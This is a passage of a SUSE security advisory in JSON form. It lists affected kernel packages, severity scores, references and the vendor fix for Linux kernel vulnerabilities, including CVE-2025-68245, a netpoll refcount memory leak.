"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
